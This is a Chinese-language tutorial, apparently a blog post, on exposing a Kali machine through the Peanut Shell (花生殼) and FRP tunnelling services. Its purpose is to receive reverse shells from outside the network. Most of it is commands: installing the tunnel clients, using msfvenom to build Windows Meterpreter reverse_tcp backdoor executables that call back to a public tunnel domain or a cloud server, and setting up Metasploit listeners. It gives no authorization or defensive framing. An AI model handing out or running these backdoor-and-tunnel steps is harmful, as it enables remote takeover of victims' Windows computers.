花生殼內網穿透&FRP
花生殼內網穿透
大致流程為:花生殼網站註冊--->繫結本地內網主機--->配置對映外網的地址監聽與本地主機對映的埠--->反彈shell
1.在花生殼上配置好地址
https://hsk.oray.com/
2.下載客戶端,用的kali所以選擇Linux下載,注意kali是基於Debian的。
https://hsk.oray.com/download
3.本地kali執行該命令,並解壓。
┌──(root㉿kali)-[/opt]
└─# wget "https://down.oray.com/hsk/linux/phddns_5.2.0_amd64.deb" -O phddns_5.2.0_amd64.deb
┌──(root㉿kali)-[/opt]
└─# dpkg -i phddns_5.2.0_amd64.deb
4.繫結SN即上面生成的SN號。
方法一:登入花生殼繫結SN並激活。
方法二:訪問http://b.oray.com 使用SN登入然後再繫結花生殼賬號,我這裡SN登入後繫結一直失敗所以使用第一種。
其實都一樣都需要花生殼和在kali生成的SN號繫結。
5.本地kali啟動花生殼
┌──(root㉿kali)-[/opt]
└─# phddns start
6.生成msf後門檔案
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=361gu87858.yicp.fun LPORT=27126 -b "\x00" -f exe -o houmen1.exe
7.msf開啟監聽模式
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.88.89
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > run
8.執行生成的該後門檔案即可在本地kali收到反彈的shell
FRP內網穿透
前提需要一臺雲伺服器,優點是方便,隱私。
1.下載frp。
https://github.com/fatedier/frp/releases
2.上傳該包到雲伺服器以及本地kali。
3.在雲伺服器以及本地kali解壓下載的檔案。
tar -zxvf frp_0.45.0_linux_amd64.tar.gz
4、進入解壓目錄分別更改frpc.ini(客戶端,即本地kali)以及frps.ini(服務端,即雲伺服器)。
vim frps.ini #這是雲伺服器上的
#注意有的雲伺服器埠需要在購買雲伺服器控制檯開通埠。
vim frpc.ini #這是本地kali的
5、先啟動雲服務端: ./frps -c frps.ini
再啟動客戶端:# ./frpc -c frpc.ini
6、生成msf後門檔案
msfvenom -p windows/meterpreter/reverse_tcp lhost=雲伺服器地址 lport=9999 -f exe -o frp.exe
7、msf啟動監聽
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 127.0.0.1
msf6 exploit(multi/handler) > set lport 4444 #注意要和客戶端frpc.ini的local_port一致
8、執行後門檔案即可反彈